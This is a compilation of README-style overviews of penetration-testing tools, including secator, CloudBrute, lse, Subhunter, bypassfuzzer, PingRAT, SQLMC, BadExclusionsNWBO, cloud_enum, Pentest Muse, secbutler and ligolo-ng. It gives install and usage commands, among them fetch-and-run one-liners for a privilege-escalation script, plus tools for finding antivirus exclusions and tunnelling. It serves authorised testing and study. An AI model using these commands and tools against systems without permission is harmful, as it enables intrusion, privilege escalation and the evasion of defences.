secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Scales from simple tasks to complex workflows
secator integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator uses external tools, so you might need to install the languages those tools are written in if they are not already present on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool, which should work on all systems supporting apt:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator comes with a minimal set of dependencies installed.
There are several addons available for secator:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
...and more! To list all the tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available here.
We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted in the cloud, and possibly apps behind proxy servers.
Here is the list of issues with previous approaches that we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operating system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file.
It looks like this:
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
For example:
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, you have to use it for both the domain (-d) and keyword (-k) arguments.
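For instance, a hedged illustration (wordlist path reused from the example above) where the full domain drives the mutations:
CloudBrute -d target.com -k target.com -m storage -t 80 -T 10 -w "./data/storage_small.txt"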
If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug open an issue.
If proxies are failing, it's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify the working proxies with your chosen provider.
Change the -T (timeout) option to get the best results for your run.
Inspired by every single repo listed here.
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1):
- Subdomain enumeration (2 engines + bruteforcing)
- User-friendly output
- Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source. First, clone the repository:
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
<domain> is the domain to be enumerated. It can be a subdomain as well.
--ports | -p is a string specification of the ports to be scanned. It can be one of the following:
- all - Scan all ports (1-65535)
- none - Skip port scanning (default)
- t<n> - Scan top n ports (same as nmap), i.e. t100 scans the top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
- 80 scans port 80
- 80-100 scans ports 80 to 100
- 80,443,8080 scans ports 80, 443 and 8080
- 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and the top 500 ports
--dns | -d is the address of the DNS server. This should be a valid IPv4 address and can optionally contain the port number:
- a.b.c.d - Use DNS server at a.b.c.d on port 53
- a.b.c.d#n - Use DNS server at a.b.c.d on port n
--wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
--rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches and the next batch is made only after the previous one is completed. Since queries can be rate limited, increasing the value does not always guarantee faster results.
--out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.
Examples:
- ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
The help menu can be accessed using ./domainim --help or ./domainim -h.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns=1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns=8.8.8.8 -r:1500 -o:results.json
The JSON schema for the results is as follows-
[
{
"subdomain": string,
"data": [
{
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
}
]
}
]
Example json for nmap.org
can be found here.
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results when there are too many. Another issue with crt.sh is the fact that it sometimes returns an SQL error. So for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute force engine).
The port scanner only uses a timeout of ping response time + 750ms. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed just brings repetition to the table.
Printing them as follows might have been better:
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scanme.nmap.org, svn.nmap.org, www.nmap.org
↳ 45.33.49.119
↳ Reverse DNS: ack.nmap.org.
But previously, while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.
The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is so the DNS server doesn't get all the queries at once but rather in a more natural way. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.
One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs there are for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author about this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will also skip valid subdomains (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
A similar thing is true for vhost enumeration with subdomain inputs. Since URLs that end with the given subdomain are returned, subdomains of similar domains are not considered. For example, scanme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.
MIT License. See LICENSE for full text.
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10 you can serve the script to other hosts with the -S flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.
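For example, a couple of illustrative invocations of the -p parameter described above:
./lse.sh -p 120   # watch processes for 2 minutes
./lse.sh -p 0     # disable the process monitor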
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. Level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. Level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.
If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.
If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.
You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example, ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.
It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.
I implemented a "Smart Filter" that lets you mute responses that look the same after they have appeared a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request.
- Easiest way to authenticate for your requests.
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"
Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>.
Specify -H "header: value" for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more, it will automatically mute it.
The repeat count is changeable in the code until I add an option to specify it via a flag.
NOTE: Can't be used simultaneously with -hc or -hl (yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
Download the binaries or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
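As a hedged illustration only (interface names and IP addresses are placeholders, and which address is the peer depends on your setup; -d and -i are the documented flags above):
sudo ./server -i eth0 -d 10.0.0.20
./client -i eth0 -d 10.0.0.10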
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
pip3 install sqlmc
Run sqlmc with the following command-line arguments:
-u, --url: The URL to scan (required)
-d, --depth: The depth to scan (required)
-o, --output: The output file to save the results
Example usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
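For instance, a hedged example that also saves the findings (the output filename is a placeholder):
sqlmc -u http://example.com -d 2 -o results.txt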
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less, it means the folder has an exclusion; otherwise, the folder is not excluded.
Since the release of BadExclusions I've been thinking about how to achieve the same results without creating so much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and inside a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.
Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusions, and not all vendors, remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write the Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Currently enumerates the following:
Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)
Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps
Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps
See it in action in Codingo's video demo here.
Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:
pip3 install -r ./requirements.txt
The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.
You can provide multiple keywords by specifying the -k argument multiple times.
Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second level of brute-forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.
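As a hedged illustration (the wordlist filenames are placeholders), supplying custom mutation and brute-force lists could look like this:
./cloud_enum.py -k somecompany -m custom_mutations.txt -b custom_brute.txt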
Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:
./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey
HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.
./cloud_enum.py -k keyword -t 10
IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.
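A minimal sketch of such an edit, assuming REGIONS is a plain Python list in gcp_regions.py (the region names below are only examples):
# gcp_regions.py -- keep only the regions relevant to your target
REGIONS = ['us-central1', 'us-east1', 'europe-west1']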
Complete Usage Details
usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]
Multi-cloud enumeration utility. All hail OSINT!
optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
So far, I have borrowed from: - Some of the permutations from GCPBucketBrute
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
Clone the repository and install the dependencies from requirements.txt:
git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse
pip install -r requirements.txt
Install Pentest Muse as a Python Package:
pip install .
In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:
python run_app.py agent
or
pmuse agent
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.
Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add the argument --openai-api-key=[your openai api key] when starting the program.
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.
secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers. It contains all the most common and tedious things used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
secbutler -h
This will display the help for the tool
__ __ __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/
v0.1.9 - https://github.com/groundsec/secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
secbutler [flags]
secbutler [command]
Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists
Flags:
-h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
secbutler is made by the GroundSec team and released under the MIT LICENSE.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project, which allows simulating attacks following MITRE TTPs (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipeline takes a Technique ID as input, or a comma-separated list of techniques, for example:
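(An illustration only; these MITRE ATT&CK technique IDs are arbitrary examples, not values from the original:)
T1059.001,T1055,T1003.001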
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment risks contaminating the environment and making the simulations less stable and predictable.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
